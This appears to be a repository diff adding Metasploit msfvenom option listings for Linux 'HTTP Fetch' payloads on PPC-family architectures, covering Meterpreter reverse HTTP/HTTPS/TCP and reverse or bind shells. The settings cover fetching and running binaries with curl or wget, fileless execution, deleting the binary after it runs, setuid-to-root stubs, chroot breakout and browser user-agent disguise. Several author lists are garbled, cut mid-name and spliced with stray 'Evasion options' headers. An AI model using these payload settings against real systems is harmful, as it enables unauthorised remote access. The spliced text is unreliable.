HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_https.txt
+106
View File
@@ -0,0 +1,106 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/ppc/meterpreter_reverse_https
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 108
Rank: Normal
Provided by:
Evasion options for payload/cmd/linux/http/ppc/meterpreter_reverse_https:
=========================
t_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME lthBvzzMnq no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an PPC payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_tcp.txt
+97
View File
@@ -0,0 +1,97 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/ppc/meterpreter_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 111
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME GaFcxwZUmDD no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an PPC payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-ppc64-shell_bind_tcp.txt
+78
View File
@@ -0,0 +1,78 @@
Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline
Module: payload/cmd/linux/http/ppc64/shell_bind_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 0
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LPORT 4444 yes The listen port
RHOST no The target address
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME vRPiJbIWuxG no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an PPC64 payload from an HTTP server.
Listen for a connection and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root)
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-ppc64-shell_find_port.txt
+77
View File
@@ -0,0 +1,77 @@
Name: HTTP Fetch, Linux Command Shell, Find Port Inline
Module: payload/cmd/linux/http/ppc64/shell_find_port
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 0
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CPORT 23590 no The local client port
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME GpPkBKxBZbnd no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an PPC64 payload from an HTTP server.
Spawn a shell on an established connection
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root)
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-ppc64-shell_reverse_tcp.txt
+85
View File
@@ -0,0 +1,85 @@
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline
Module: payload/cmd/linux/http/ppc64/shell_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 0
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME AtxdiUGw no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an PPC64 payload from an HTTP server.
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root)
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_http.txt
+104
View File
@@ -0,0 +1,104 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/ppc64le/meterpreter_reverse_http
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 108
Rank: Normal
Provided by:
B
Evasion options for payload/cmd/linux/http/ppc64le/meterpreter_reverse_http:
=========================
@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME ssRObbfaiI no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute a PPC64LE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_https.txt
+106
View File
@@ -0,0 +1,106 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/ppc64le/meterpreter_reverse_https
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 111
Rank: Normal
Provided by:
Br
Evasion options for payload/cmd/linux/http/ppc64le/meterpreter_reverse_https:
=========================
apid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME zpXXDAbAdXJ no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute a PPC64LE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
